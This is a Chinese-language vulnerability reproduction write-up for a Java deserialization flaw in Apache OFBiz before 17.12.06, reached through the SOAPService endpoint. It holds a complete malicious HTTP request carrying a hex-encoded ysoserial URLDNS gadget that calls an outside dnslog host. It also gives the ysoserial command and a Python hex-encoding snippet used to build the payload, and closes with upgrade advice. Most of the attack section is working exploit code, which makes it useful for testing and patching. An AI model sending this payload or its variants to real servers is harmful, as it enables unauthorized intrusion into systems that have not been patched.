简介
Apache OFBiz是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。
影响版本
apache:ofbiz: <17.12.06
环境搭建
docker run -d -p 811:8080 -p 8443:8443 opensourceknight/ofbiz
漏洞复现
构建数据包
POST /webtools/control/SOAPService HTTP/1.1Host: 192.168.204.131:811Content-Length: 1023Accept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36Content-Type: application/xmlOrigin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfncAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:Connection: close<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><ser><map-HashMap><map-Entry><map-Key><cus-obj>aced0005737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c770800000010000000017372000c6a6176612e6e65742e55524c962537361afce47203000749000868617368436f6465490004706f72744c0009617574686f726974797400124c6a6176612f6c616e672f537472696e673b4c000466696c6571007e00034c0004686f737471007e00034c000870726f746f636f6c71007e00034c000372656671007e00037870ffffffffffffffff74001033346669706e2e646e736c6f672e636e74000071007e0005740004687474707078740017687474703a2f2f33346669706e2e646e736c6f672e636e78cus-obj>map-Key><map-Value><std-String value="http://34fipn.dnslog.cn"/>map-Value>map-Entry>map-HashMap>ser>soapenv:Body>soapenv:Envelope>
中间的cus-obj 直接用
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar URLDNS http://34fipn.dnslog.cn >1.ot然后转成hex 即可
import binasciifilename = '1.ot'with open(filename, 'rb') as f:content = f.read()print(binascii.hexlify(content))
修复建议
升级到安全版本
https://ofbiz.apache.org/download.html#vulnerabilities
